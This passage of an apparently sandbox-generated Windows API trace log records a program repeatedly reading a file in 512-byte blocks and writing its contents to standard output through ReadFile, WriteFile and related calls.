_get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.969] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.969] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, 
lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.970] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.970] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, 
lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.971] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.971] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 
[0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.973] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.973] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: 
lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.974] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.974] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.974] GetFileType (hFile=0x50) returned 0x1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: 
lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, 
lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.977] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.977] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.983] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, 
